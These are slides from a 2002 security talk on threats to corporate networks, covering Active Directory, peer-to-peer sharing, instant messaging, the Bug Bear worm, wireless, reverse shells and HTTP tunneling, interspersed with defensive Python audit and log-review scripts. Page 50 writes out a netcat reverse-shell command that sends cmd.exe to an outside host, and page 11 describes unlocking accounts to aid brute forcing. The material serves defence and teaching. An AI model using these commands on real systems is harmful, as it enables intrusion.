Page 1: Analysts International Modern Threats to Information Infrastructure V1.0 11-20-02

Analysts International

Modern Threats to Information Infrastructure

V1.0 11-20-02

Page 2

Introductions
• Mark Lachniet from Analysts International, Sequoia Services Group
• Senior Security Engineer and Security Services technical lead
• Former I.S. director for Holt Public Schools
• Certified Information Systems Security Professional (CISSP)
• Microsoft MCSE, Novell Master CNE, Linux LPI Certified LPIC-1, Check Point Certified CCSE, TruSecure TICSA, etc.

Page 3

Agenda
• Windows 2000 Active Directory
• Peer to Peer file sharing
• Instant Messaging
• Bug Bear
• Wireless
• Reverse command shells
• HTTP Tunneling / GoToMyPC.com
• Round table – Q&A – Brainstorming

Page 4

Active Directory Overview
• Active Directory is the directory service for Win2k
• NT 4.0 domains simply did not scale very well in large organizations; A.D. is distributed
• By default, all of the old NetBIOS stuff is still running, but there are new capabilities
• Improves management, especially with user and machine policies, delegation of authority functions, and integrated software such as Exchange
• Tight integration with DNS (Dynamic DNS)
• Tight integration with LDAP (Lightweight Directory Access Protocol)
• Integration with Kerberos (authentication)

Page 5

Hierarchical Directories (diagram)

Page 6

Pre-Win2k Compatibility Mode
• Is required for a variety of backwards-compatibility features
• Is probably enabled in your environment unless you are ALL Windows 2000
• Allows access to all of the information you used to get via NetBIOS (shares, users, etc.)
• An Active Directory server will emulate a PDC for Windows NT4 type environments and systems
• If selected, the “everyone” group is given permissions to read the directory, etc. (just like NT4) and hence anonymous access is allowed
• Will be required to interoperate with various products such as UNIX SAMBA, NT4.0 RAS servers, etc.

Page 7

A.D. Default Configuration
• Logging of A.D. activity is disabled by default
• Also, authenticated users are able to enumerate the entire directory
• In a large company, you may wish to lock down your directory so that users in an OU (such as engineering) cannot enumerate objects in another OU (such as internal auditing)
• For details on how to lock down this browsing of OUs and A.D. information check out: www.microsoft.com/serviceproviders/deployment/SP_AD_Architecture_Configuration.doc

Page 8

A.D. and Security Policies
• Although not discussed in this presentation, A.D. is the means by which security policy is passed down to workstations and users
• Policies are based on domain, which may be an entire A.D. tree or just a sub-component (the relationship between A.D. and domains may be murky at first glance)
• Lots of information is available on the Internet about the config and use of policies
• I suggest that you refer to the NSA security guides on this topic: http://www.nsa.gov/snac/index.html

Page 9

Active Directory - LDAP
• Based on the X.500 Directory Access Protocol, and is similar to Novell NDS and other X.500 compliant directories in terms of naming conventions, etc.
• Win2k supports LDAP v2 and v3
• Should be compatible with other LDAP implementations, both server and client
• Runs on TCP/389 (you should portscan your internal and external network for this port)
• Uses cleartext authentication by default
• v3 support includes SASL (Simple Authentication and Security Layer) authentication, which supports encryption through NTLM or Kerberos
• Many client applications that access LDAP stores for passwords can be forced to only use NTLM (this is a good idea)

Page 10

LDAP Tricks – ADSI Edit
• ADSI Edit allows raw access to the directory – this is required for complicated operations but is also very dangerous
• Using ADSI you can do a large variety of things in an “easy” way via scripting as well as the editor
• “Active Directory Service Interfaces (ADSI) enable systems administrators and developers of scripts or C/C++ applications to easily query for and manipulate directory service objects.”
• ADSI can access Active Directory, but lots of other handy stuff as well
• Extensive information on this at Microsoft’s Developer Network web site (MSDN)

Page 11

LDAP Tricks – ADSI Scripting
• ADSI supports many scripting capabilities:
– Enumerating objects, finding information
– Adding users, creating custom objects (such as an object that shows the time of last backup)
– Finding users with specific criteria:
  • Account disabled
  • Intruder lockout
  • Password not required
  • Password can’t change
– Also the ability to *SET* information:
  • “un-lockout” an account (handy for brute forcing a password on a specific account, isn’t it?)
  • Add/remove users from group (add as an admin, run a command, remove user again!)
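The account criteria listed above are, in Active Directory, mostly bits of the userAccountControl attribute. The following Python script is an added example (not from the presentation) that decodes those bits from an LDIF export of user objects, so an auditor can review disabled, locked-out, no-password-required and never-expiring accounts offline; the LDIF, domain and account names are constructed for the example.

```python
"""Audit userAccountControl flags from an LDIF export of Active Directory users.

Added example, not from the presentation. The bit values are those documented
by Microsoft for userAccountControl; the LDIF below is constructed sample
data and the domain and account names are made up.
"""
import base64

# userAccountControl bit values (subset).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",             # legacy bit; AD records lockout in lockoutTime
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",  # documented, but AD enforces this through ACLs, not this bit
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
}
# Flags worth reporting to a reviewer.
RISKY = {"ACCOUNTDISABLE", "PASSWD_NOTREQD", "DONT_EXPIRE_PASSWORD"}

SAMPLE_LDIF = """\
# constructed export, not real directory data
dn: CN=Alice Adams,OU=Engineering,DC=example,DC=com
objectClass: user
sAMAccountName: aadams
userAccountControl: 512

dn: CN=Bob Brown,OU=Engineering,DC=example,DC=com
objectClass: user
sAMAccountName: bbrown
userAccountControl: 514

dn: CN=svc backup,OU=Services,
 DC=example,DC=com
objectClass: user
sAMAccountName: svcbackup
description:: U2VydmljZSBhY2NvdW50
userAccountControl: 66080
lockoutTime: 132000000000000000
"""


def parse_ldif(text):
    """Parse a minimal LDIF export into a list of {attribute: [values]} dicts."""
    # Unfold continuation lines: a line starting with one space continues the previous one.
    logical = []
    for raw in text.splitlines():
        if raw.startswith(" ") and logical:
            logical[-1] += raw[1:]
        else:
            logical.append(raw)
    entries, current = [], None
    for line in logical + [""]:           # trailing blank flushes the last entry
        if not line.strip() or line.startswith("#"):
            if current:
                entries.append(current)
                current = None
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):          # "attr:: base64value"
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        if attr.lower() == "dn":           # a dn line starts a new entry
            current = {"dn": [value]}
        elif current is not None:
            current.setdefault(attr, []).append(value)
    return entries


def decode_uac(value):
    """Names of the userAccountControl bits set in an integer value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def audit_accounts(ldif_text):
    """Return {sAMAccountName: [findings]} for user entries that need a look."""
    findings = {}
    for entry in parse_ldif(ldif_text):
        if "user" not in [c.lower() for c in entry.get("objectClass", [])]:
            continue
        name = entry.get("sAMAccountName", entry["dn"])[0]
        uac = int(entry.get("userAccountControl", ["0"])[0])
        flags = [f for f in decode_uac(uac) if f in RISKY]
        # Intruder lockout lives in lockoutTime: a non-zero value means a lockout
        # was recorded and has not been cleared by an administrator unlocking it.
        if int(entry.get("lockoutTime", ["0"])[0]) != 0:
            flags.append("LOCKED_OUT")
        if flags:
            findings[name] = flags
    return findings


if __name__ == "__main__":
    for account, flags in audit_accounts(SAMPLE_LDIF).items():
        print(account, ", ".join(flags))
```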

Page 12

LDAP Brute Force Attacks
• http://www.phenoelit.de/kold/download.html
• Specifically designed to attack LDAP, with support for Active Directory on Windows 2000
• Can be used to enumerate all IDs found in the directory and brute force attack them with words from a dictionary file
• Can use an anonymous connection, or log in using a given user ID and password
• Account lockout / logging of LDAP attacks (brute force, etc.) may be an issue that needs more research
• Phenoelit also has “lumberjack” which will do off-line hacking of LDAP directories (stored in LDIF format)

Page 13

K0ld Screen Capture

Page 14

Ldapminer.exe on Win2k
• Allows full enumeration of the data contained within LDAP (Active Directory)
• Can dump all of the data discovered to a text file for later analysis in LDIF format (see last slide – lumberjack)
• Default Windows 2000 configuration will reveal some useful information:
– Current system time
– X.500 naming (may indicate corporate config)
– DNS names and IP addresses (including internal)
– If it is a global catalog (implies 1st AD server but may have implications for Exchange or other penetration testing)

Page 15

A.D. and L0phtCrack
• L0phtCrack *will* work on Windows 2000 Active Directory information
• Uses PWDUMP3 to extract the hashes, as long as you have admin access
• Can access the hashes across the network, and may not require physical access
• All of your favorite auditing tricks should still work fine with L0phtCrack, but you will need admin access
• One significant change is that it is no longer possible to steal the entire domain account list by booting to a floppy disk and grabbing the SAM file from the hard drive
• One trivia fact – did you know that L0phtCrack cannot crack high-bit characters (such as ALT-Keypad 0,1,2)?

Page 16

A.D. and Kerberos
• Kerberos is the updated authentication system for Windows 2000
• Kerberos is an open standard, and other implementations exist (and are somewhat compatible with Win2k)
• Windows 2000 clients will attempt to use Kerberos by default, and will downgrade to lesser authentication systems (such as NTLMv2) if there are problems
• In Kerberos, a “realm” is a logical network boundary, which correlates 1:1 with a Windows domain
• This means that a Kerberos realm does not necessarily map to an Active Directory tree
• Be aware of this relationship, especially if you interoperate with UNIX systems, etc.

Page 17

A.D. and Dynamic DNS
• Windows Active Directory relies on Dynamic DNS
• There is a logical link between DNS naming and the directory structure
• Windows 2000 clients will update their DNS name (e.g. workstation.isaca.org) with their current IP address by means of the DHCP client service
• Dynamic DNS supports secure and insecure modes – if you rely on DNS naming for important security functions this should be researched
• Dynamic DNS is handy for auditors to find workstations in a DHCP environment, but it is also useful for hackers
• One personal observation is that the Dynamic DNS information is exposed in the LDAP directory, even to unauthenticated users
• Also, keep in mind that DNS may allow for zone transfers, enumeration and other reconnaissance

Page 18

Active Directory Auditing
• You must manually enable logging and auditing for Active Directory
• Enable auditing of all failed accesses of Active Directory as well as logins, etc.
• For very granular auditing (possibly through scripts or for troubleshooting purposes) use DSACLS and ACLDIAG
• DSACLS.EXE “facilitates management of access control lists (ACLs) for directory services. DsAcls enables you to query and manipulate security attributes on Active Directory objects. It is the command-line equivalent of the Security page on various Active Directory snap-in tools”

Page 19

Active Directory Auditing
• With ACLDIAG.EXE you can:
– Compare the ACL on a directory services object to the permissions defined in the schema defaults
– Check or fix standard delegations performed using templates from the Delegation of Control wizard in the Active Directory Users and Computers snap-in, a Windows 2000 administrative tool
– Get effective permissions granted to a specific user or group, or to all users and groups that show up in the ACL

Page 20

Theoretical Attacks on Active Directory
• According to the SANS writeup (see references), one dangerous possibility is embedding binary “blobs” in the directory that are executed by MMC
• Denial of Service – rapidly changing large numbers of objects, and then setting them as being high priority (critical) for replication
• Use of A.D. as a virus distribution system
• Modifying the schema in an inappropriate way
• Deeply nested OU objects?
• Mysterious problems – in testing, my LDAP server frequently froze up while using standard tools

Page 21

Backing up Active Directory
• In order to have AD security, you should make sure that it is properly backed up
• Restoring AD can be challenging and complicated – make sure you have researched it before you try
• Backing up the Active Directory also includes backing up system state data files. System state data files include:
– Active Directory
– Certificate services database (if a certificate server)
– Class registration (database of information about the component services)
– Cluster service (if installed)
– Performance counter configuration
– Registry
– Sysvol (shared folder that contains group policy templates and login scripts)
– System startup files

Page 22

Active Directory References
• SecurityFocus articles on A.D.:
http://online.securityfocus.com/infocus/1292
http://online.securityfocus.com/infocus/1293
http://online.securityfocus.com/infocus/1470
http://online.securityfocus.com/infocus/1509
http://online.securityfocus.com/infocus/1535
• Preventing L0phtCrack attacks on A.D.:
http://rr.sans.org/win2000/l0phtcrack.php

Page 23

More A.D. References
• A comparison of NT4 domains and Win2k A.D.: http://www.microsoft.com/mspress/books/sampchap/3173.asp
• How to set up auditing of Active Directory: http://www.softheap.com/security/audit-active-directory-4.html
• Using LDP to find data in Active Directory: http://support.microsoft.com/default.aspx?scid=KB;en-us;q224543
• Discussion on Pre-Windows 2000 Compatibility Mode: http://support.microsoft.com/default.aspx?scid=KB;en-us;q257988

Page 24

Peer to Peer File Sharing
• Several different networks and clients:
– Aimster
– FastTrack
– iMesh
– Audiogalaxy
– MFTP
– NeoModus
– Gnutella
– OpenNap

Page 25

Peer to Peer File Sharing
• The most popular network by far is Gnutella
• Gnutella has many different clients including:
– BearShare*
– Gnucleus
– GTK-Gnutella
– LimeWire
– Mactella
– Morpheus*
– Phex
– Qtella
– Shareaza*
– XoLoX
• Different clients have different features, systems and risks

Page 26

P2P File Sharing History
• Napster was the first successful and important one, but Napster made one mistake
• Napster used centralized servers that were under their control
• Hence the system could be shut down by going after Napster with legal action
• Newer systems have “master” nodes, but all they do is maintain lists of other peers out on the network
• Master nodes are replaceable – you could start your own P2P network by setting up your own master servers

Page 27

Napster-Style P2P (diagram)
• This wasn’t too bad, at least you knew what to block

Page 28

Gnutella Style P2P (diagram)
• This is *bad* for you because there is no single choke point to cut off

Page 29

P2P File Share Features
• Keyword searching
• Rate limiting / Quality of Service (via bandwidth or simultaneous upload and download limits)
• Request queuing at the serving host
• Chat facilities
• Use SHA hashes of files to uniquely ID them:
– SHA hashes are unique by file
– IDs files that are the same but have different names
– Allows for “swarm” downloads where parts of the same file are downloaded from multiple sources simultaneously (cool)
– Allows for file resumption if a source is unavailable (turned off, hung up, etc.)
– Allows for a patient person to get almost anything they can find listed

Page 30

Gnutella Communications
• Uses 5 distinct types of protocol messages: ping, pong, query, query reply, and push
• Use Shareaza to get a good protocol analyzer / decoder to see them
• Ping and Pong discovery – ask who is out there, return IP address and amount of shared files
• Query and Query reply – gives search terms (keywords) and minimum bandwidth requirements. Reply gives IP address, port, speed, matching files and GUID of querier
• Querier then connects to the server and attempts to download the file (this will break if the server is behind a firewall)
• The Push message is sent if the querier cannot connect to the server to download the data

Page 31

Push – Firewall Circumvention
• Sends the querier’s IP and port number and asks the file host to push the file to it – this will bypass a single firewall in the mix
• If both parties are behind a firewall you are probably safe… For now…
• How can you stop it? Use a firewall to block *all* outgoing communications
• Require a proxy server to mediate all requests outwards (Squid, MS-PROXY, Border Manager)
• It’s only a matter of time before P2P clients can tunnel within HTTP requests that are “proxy friendly”
• Can already be done with special (but thankfully complicated) HTTP tunneling software
• For Gnutella, you can block the “root” servers but an alternate could always be used
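The two slides above describe the five Gnutella message types and the push message used to get around a single firewall. The following Python decoder is an added example (not from the presentation) that parses the 23-byte descriptor header and the ping, pong, query, query hit and push payload layouts of the Gnutella 0.4 specification, so a defender looking at a capture can see which messages, search terms and push targets it contains; the capture and GUIDs are constructed, and the 10.20.30.x addresses reuse the network from the later diagrams.

```python
"""Decode Gnutella 0.4 descriptors from a captured byte stream.

Added example, not from the presentation. Layouts follow the Gnutella 0.4
protocol specification; the capture below is constructed, not recorded.
"""
import struct

# Header: 16-byte descriptor ID, payload descriptor, TTL, hops, payload length (little-endian).
HEADER = struct.Struct("<16sBBBI")
DESCRIPTORS = {0x00: "Ping", 0x01: "Pong", 0x40: "Push", 0x80: "Query", 0x81: "QueryHit"}
HANDSHAKE = b"GNUTELLA CONNECT/0.4\n\n"   # opens a 0.4 servent connection


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def parse_payload(kind, p):
    """Decode the fields of one payload; unknown or short payloads give {}."""
    if kind == 0x01 and len(p) >= 14:               # Pong: port, IP, files, kbytes shared
        port = struct.unpack_from("<H", p)[0]
        files, kbytes = struct.unpack_from("<II", p, 6)
        return {"port": port, "ip": ip_str(p[2:6]), "files": files, "kbytes": kbytes}
    if kind == 0x80 and len(p) >= 3:                # Query: minimum speed, NUL-terminated criteria
        min_speed = struct.unpack_from("<H", p)[0]
        criteria = p[2:].split(b"\x00", 1)[0].decode("latin-1")
        return {"min_speed": min_speed, "criteria": criteria}
    if kind == 0x81 and len(p) >= 27:               # QueryHit: hits, port, IP, speed, ..., servent ID
        hits, port, ip, speed = struct.unpack_from("<BH4sI", p)
        return {"hits": hits, "port": port, "ip": ip_str(ip), "speed": speed, "servent": p[-16:].hex()}
    if kind == 0x40 and len(p) >= 26:               # Push: servent ID, file index, IP, port to push to
        servent, index, ip, port = struct.unpack("<16sI4sH", p[:26])
        return {"servent": servent.hex(), "file_index": index, "ip": ip_str(ip), "port": port}
    return {}


def parse_descriptors(data):
    """Split a byte stream into descriptors; stops at a truncated message."""
    msgs, off = [], 0
    while off + HEADER.size <= len(data):
        guid, kind, ttl, hops, length = HEADER.unpack_from(data, off)
        payload = data[off + HEADER.size: off + HEADER.size + length]
        if len(payload) < length:
            break
        off += HEADER.size + length
        msg = {"guid": guid.hex(), "type": DESCRIPTORS.get(kind, "Unknown"), "ttl": ttl, "hops": hops}
        msg.update(parse_payload(kind, payload))
        msgs.append(msg)
    return msgs


def summarize(data):
    """Counts per type plus search terms and push targets, the facts an IDS alert would carry."""
    handshake = data.startswith(HANDSHAKE)
    if handshake:
        data = data[len(HANDSHAKE):]
    summary = {"handshake": handshake, "counts": {}, "queries": [], "push_targets": []}
    for m in parse_descriptors(data):
        summary["counts"][m["type"]] = summary["counts"].get(m["type"], 0) + 1
        if m["type"] == "Query":
            summary["queries"].append(m["criteria"])
        if m["type"] == "Push":
            summary["push_targets"].append("%s:%d" % (m["ip"], m["port"]))
    return summary


def _descriptor(kind, payload, ttl=7, hops=0, guid=b"\x01" * 16):
    """Assemble one descriptor; used only to build the constructed capture."""
    return HEADER.pack(guid, kind, ttl, hops, len(payload)) + payload


SAMPLE_CAPTURE = (
    _descriptor(0x00, b"")                                                        # ping
    + _descriptor(0x01, struct.pack("<H4sII", 6346, bytes([10, 20, 30, 50]), 120, 650000), hops=1)
    + _descriptor(0x80, struct.pack("<H", 56) + b"report.xls\x00")                # query
    + _descriptor(0x40, struct.pack("<16sI4sH", b"\x02" * 16, 17, bytes([10, 20, 30, 60]), 6346))
)

if __name__ == "__main__":
    for m in parse_descriptors(SAMPLE_CAPTURE):
        print(m)
    print(summarize(HANDSHAKE + SAMPLE_CAPTURE))
```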

Page 32

P2P File Share Security Risks
• Spyware Spyware Spyware!
• Usually no virus scanning is done – you need to do your own
• Spoofed servers will cough up Trojans for almost any simple query (like the Benjamin Worm)
• Sharing of more than you intended
• “Transit” sharing of naughty files has been hinted at!
• Security holes (intentional or not) in the software itself
• Program minimizes (not shuts down) when exited
• P2P specific worms (e.g. the “Gnutella Worm”)
• Content problems and liability!
• Bandwidth leeching

Page 33

Future P2P Risks
• A lot of things about P2P are “dicey” but haven’t yet been exploited
• For example, the GUID is a unique identifier that is sometimes based on MAC address! (pre-Win2k, it is said)
• That means that queries can possibly be tracked to a unique physical workstation
• A monitoring station could also record queries by GUID/MAC as well as IP address and attempt to ascertain information about that user (such as sexual preferences, areas of interest, etc.)
• Great possibility for leveraging the P2P network as Denial of Service zombies by tricking all Gnutella clients into flooding a host (e.g. whitehouse.gov)

Page 34

P2P “NG” Share Sniffer
• Operates under the creed of “who needs Napster when you have Windows”
• Scans a subnet for “open” Windows shares and creates a database of them
• These open shares are then used as the storage repositories for various types of files
• This product used to be at sharesniffer.com but is gone now. I wonder why
• This was allegedly going to be a pay service!
• Due to the lack of awareness on the part of home users, this will probably work quite well

Page 35

Instant Messaging
• IM is everywhere, including my cell phone! (although I don’t use it)
• Over 81 MILLION users
• Check out: http://www.infosecuritymag.com/2002/aug/cover.shtml
• Various types of clients: AOL, ICQ, Microsoft .NET Messenger, Yahoo Messenger, etc.
• Specifically designed to get around firewalls in order to work
• Require servers for some functions (login, user lookup) but can talk directly to nodes for some things (such as file transfers)

Page 36

Page 37

Problems with IM
• Bypasses gateway AntiVirus products
• Typically unencrypted
• Security problems in the software itself – many previous hacks, probably many more to come
• May allow remote-control of machines inside the firewall
• Ability to send files, URLs, etc. to individuals
• Hard to stop at the firewall
• Hard to track, log and account for
• No robust authentication systems
• Secure IM costs $$ and may require an ongoing service contract or your own server

Page 38

Instant Messaging Problems: Case in Point – msgsnarf
• Dug Song released a number of network sniffing tools at http://monkey.org/~dugsong/dsniff
• These are especially interesting because of their special features!
• One feature is that it will work on a switch by using “ARP poisoning” such that even switched networks are vulnerable to sniffing
• Another feature is the inclusion of application-specific sniffers such as mailsnarf (all SMTP messages), webspy (all URLs) and msgsnarf (Instant Message information)
• This might have a “white-hat” application, actually, if you need to monitor it

Page 39

IM Management Techniques
• Use an IDS to alert you to matching traffic (and then go gently inform the user)
• Block access to the login servers and ports (refer to Infosecurity Magazine’s August issue for details)
• Tightly control the workstation using imaging and desktop security products
• Require the use of proxy servers (only works in some cases – disable CONNECT on proxy)
• Use a specialized product to manage and control the access such as Akonix – this product can log and control IM and P2P software

Page 40

Bug Bear
• Known as W32.Bugbear or I-Worm.Tanatos
• Some key subject lines:
– “bad new”
– “Membership Confirmation”
– “Market Update Report”
– “Your Gift”
• Replicates through address book
• Copies itself on available network shares including printers! (if you see binary garbage on a printer, this may be a sign)
• Includes Trojan software:
– Disables AntiVirus software
– Built-in key-logger
– Back door software

Page 41

Bug Bear
• Exploits an OLD (May 16, 2001) bug in IE and Outlook, addressed by MS01-027
• Copies several files to the filesystem and then runs them at each startup by modifying the registry: HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
• Runs a keylogger that sends all of your keystrokes (including passwords) to one of 22 different e-mail addresses
• Creates a trojan / backdoor that runs on port 36794 – might want to check FW logs for that
• Also has its own web server that it can start up remotely to abuse a system

Page 42

Wireless
• Yes, wireless is insecure…. Especially anything you purchased less than 6 months ago and didn’t use another means of security (like a VPN)
• Until recently, the only security that you could get from the wireless Access Points (APs) was Wired Equivalent Privacy (WEP)
• WEP comes in 64-bit and 128-bit security features, neither of which will do you any good at all if someone really wants to get you
• Newer products have much better security and support for better authentication systems (including bi-directional authentication to minimize the risk of “rogue” access points)

Page 43

Wireless
• Wardriving – people think it’s fun, it’s cheap, and in some cases a sport
• Wireless leaks – connections can be made from physical locations outside of your control by using special hardware and software
• Omnidirectional magnetic-mount antennas, directional antennas, and even Pringles cans do a pretty good job of picking up signals you never thought possible
• Not only can anyone find your network, but they can (probably) tell what your SSID is, if you use WEP, and what vendor your equipment is

Page 44

Wireless
• Above and beyond that, modern software integrates with a GPS over a serial port to record the longitude and latitude of your AP
• When posted on the Internet, your dirty laundry is aired out for all to see
• Check out http://www.netstumbler.com for lots of great information
• Try it out yourself, you may be surprised
• War driving is not, in itself, illegal! However, if you ever use an AP without permission, that is over the line.

Page 45

From Work to Home: 9 Access Points in 15 Minutes

Page 46

Wireless Security Measures
• There are many things you can do
• Put access points on a special DMZ segment on a firewall and restrict traffic
• Require users to use a VPN client to access internal resources
• Use a modern authentication system such as 802.1X (in Windows XP) and/or LEAP
• These systems can require a successful authentication (for example to a RADIUS server) before allowing a user to associate with an access point
• Can also require MUTUAL authentication between the AP and client in addition to user authentication
• If this didn’t exist, you could use a MitM (Man in the Middle) attack to get auth info by setting up your own “rogue” AP

Page 47

Wireless Security Measures
• Regularly scan and war-drive your own facilities and companies
• Consider tuning an IDS for wireless attack signatures (there was a recent article on this)
• Consider putting up a wireless honeypot system
• Consider using a wireless “flooding” system that sends out huge quantities of random Access Point information to confuse (and delight) war drivers

Page 48

Reverse Command Shells
• One would think that if you block all incoming access, it should be impossible to access internal systems
• This is only partially true, because it assumes that the client is honest
• With P2P, IM and everything else, this is clearly not the case any more – we cannot trust our users to be security minded
• Reverse command shells, e.g. the NetCat attack, are particularly scary
• Using a utility program such as NetCat, even a Windows server can be accessed from an outside server

Page 49

How Reverse Shells Work
(Diagram: The Internet – Firewall – internal network with Client Workstation 10.20.30.40, Client Workstation 10.20.30.50, a host at 10.20.30.60 and a Laser printer at 10.20.30.70; Hacker Workstation lachniet.com on the Internet side)
• Imagine the above scenario. Lachniet.com cannot hit anything on the inside network directly because you have a firewall, a 10.X network, and no direct Network Address Translation, but the client has Internet access

Page 50

How Reverse Shells Work
(Diagram: same network as the previous slide; the hacker workstation is labelled “LISTEN ON 8080!” and the client workstation “Send cmd.exe to lachniet.com 8080”)
• Hacker runs NetCat in Listen mode on port 8080 on lachniet.com (netcat -l -p 8080)
• Client runs NetCat with an argument of cmd.exe and directs all output to lachniet.com port 8080 (nc -e cmd.exe lachniet.com 8080)

Page 51

How Reverse Shells Work
• The result – full access as logged in user
• To stop it – no outgoing access!
• Except by proxy server

Page 52

HTTP Tunneling
• It used to be that a firewall, when properly configured, would stop clients from doing naughty things (like reverse command shells)
• Ideally we would block all outgoing access, and allow only web access through an HTTP proxy server
• This is all well and good, but it is also possible to encapsulate non-HTTP data inside of HTTP requests and data, and then pass that data down to lower layers of the OSI model
• In this way, even the most paranoid countermeasures can be circumvented, including a restrictive firewall and a proxy server
• Technically speaking, it looks something like this:

Page 53

HTTP Tunneling in Practice
• Client wants to run a P2P file sharing client
• Dotted lines are HTTP traffic, solid line is TCP
(Diagram: The Internet – Firewall – internal network with Proxy Server 10.20.30.40, Client Workstation 10.20.30.50 (runs HTTP tunnel client and SOCKS client), a host at 10.20.30.60 and a Laser printer at 10.20.30.70; on the Internet side, Hacker Workstation lachniet.com, where the HTTP tunnel listens on 443 and a SOCKS server listens as well, and a Gnutella Host)

Page 54

GoToMyPC.com
• Basically the same thing, except you are using a pay service for your HTTP tunnel termination
• The service also acts as a broker for who can connect to your PC
• Hopefully this broker is working properly and the average hacker CANNOT connect to your PC (note that I have seen some discussion of WebEx conferencing having vulnerabilities along these lines)
• You also get more control and presumably security through SSL, reporting, users and groups and such

Page 55

HTTP Tunneling Counter-measures
• Block *all* outgoing traffic at a firewall, and require all traffic to go through a proxy server
• Use a firewall with strict RFC compliance (I heard of some reported success with Raptor/Symantec?)
• Make sure your proxy server doesn’t allow the CONNECT verb
• Configure an IDS to sense certain types of HTTP tunneling signatures (RealSecure can detect gotomypc.com traffic signatures)
• Block all known destination servers such as those from the gotomypc.com service
• Carefully review your firewall and proxy server logs! If you see a large amount of HTTP activity going to a single host (especially one that doesn’t seem legit) check it out – go browse it yourself
• Log review may be your only recourse!
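The log-review advice above (CONNECT through the proxy, one host taking a large share of a client’s HTTP volume, known tunnel endpoints) can be scripted, and the same pass can apply two earlier slides: the Bug Bear backdoor on port 36794 and the rule that only the proxy may talk outbound. The following Python script is an added example, not from the presentation; its proxy lines are constructed in the layout of Squid’s native access.log, its firewall lines use a made-up “proto src:port -> dst:port action” layout rather than any vendor’s format, and the proxy address, blocked-host list and thresholds are assumptions.

```python
"""Review proxy and firewall logs for tunneling, reverse shells and Bug Bear traffic.

Added example, not from the presentation. Proxy lines follow the layout of
Squid's native access.log; firewall lines use a constructed layout. All
addresses, hosts and byte counts below are made up.
"""
from collections import defaultdict

PROXY_HOST = "10.20.30.40"               # assumed: the only host allowed outbound
BUGBEAR_PORT = 36794                     # backdoor port named on the Bug Bear slide
BLOCKED_HOSTS = {"tunnel.example.net"}   # constructed list of known tunnel endpoints

PROXY_LOG = """\
1037900001.100    120 10.20.30.50 TCP_HIT/200 3110 GET http://www.example.com/index.html - NONE/- text/html
1037900002.200   4500 10.20.30.50 TCP_MISS/200 48213 GET http://news.example.org/ - DIRECT/198.51.100.7 text/html
1037900003.300  61000 10.20.30.50 TCP_TUNNEL/200 9813456 CONNECT tunnel.example.net:443 - DIRECT/203.0.113.9 -
1037900004.400    900 10.20.30.60 TCP_MISS/200 2200 GET http://www.example.com/logo.gif - DIRECT/192.0.2.1 image/gif
"""

FIREWALL_LOG = """\
tcp 10.20.30.50:1041 -> 192.0.2.55:36794 ALLOW
tcp 10.20.30.40:2233 -> 198.51.100.7:80 ALLOW
tcp 10.20.30.60:1055 -> 203.0.113.9:8080 ALLOW
tcp 10.20.30.60:1056 -> 203.0.113.9:8080 DENY
"""


def proxy_host(url):
    """Host part of a logged URL or CONNECT target (scheme, path and port removed)."""
    host = url.split("://", 1)[-1].split("/", 1)[0]
    return host.rsplit(":", 1)[0] if ":" in host else host


def review_proxy_log(text, share=0.8, min_bytes=1_000_000):
    """Return (client, host, reason) findings from Squid-style access log lines.

    A host is reported when it received at least min_bytes from a client and
    that was at least the given share of everything the client fetched.
    """
    findings = []
    volume = defaultdict(lambda: defaultdict(int))   # client -> host -> bytes
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        client, size, method, url = fields[2], int(fields[4]), fields[5], fields[6]
        host = proxy_host(url)
        volume[client][host] += size
        if method == "CONNECT":               # the verb the slide says to disable
            findings.append((client, host, "CONNECT through proxy"))
        if host in BLOCKED_HOSTS:
            findings.append((client, host, "known tunnel endpoint"))
    for client, hosts in volume.items():
        total = sum(hosts.values())
        for host, nbytes in hosts.items():
            if nbytes >= min_bytes and nbytes / total >= share:
                findings.append((client, host, "%d bytes, %.0f%% of client's HTTP volume"
                                 % (nbytes, 100.0 * nbytes / total)))
    return findings


def review_firewall_log(text, proxy=PROXY_HOST):
    """Return (source, destination, reason) findings from firewall log lines."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[2] != "->":
            continue
        src, dst, action = parts[1], parts[3], parts[4]
        src_ip, src_port = src.rsplit(":", 1)
        dst_ip, dst_port = dst.rsplit(":", 1)
        if BUGBEAR_PORT in (int(src_port), int(dst_port)):
            findings.append((src_ip, dst, "Bug Bear backdoor port"))
        if action == "ALLOW" and src_ip != proxy:   # only the proxy should talk outbound
            findings.append((src_ip, dst, "outbound connection bypassing the proxy"))
    return findings


if __name__ == "__main__":
    for finding in review_proxy_log(PROXY_LOG) + review_firewall_log(FIREWALL_LOG):
        print(*finding)
```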

Page 56

Q&A and Brainstorming

Mark Lachniet, Sr. Security Engineer
CISSP, MCNE, MCSE, CCSE, LPIC-1, TICSA
Analysts International - Sequoia Services
3101 Technology Blvd. Suite A
Lansing, MI 48910
phone: 517.336.1004
fax: 517.336.1004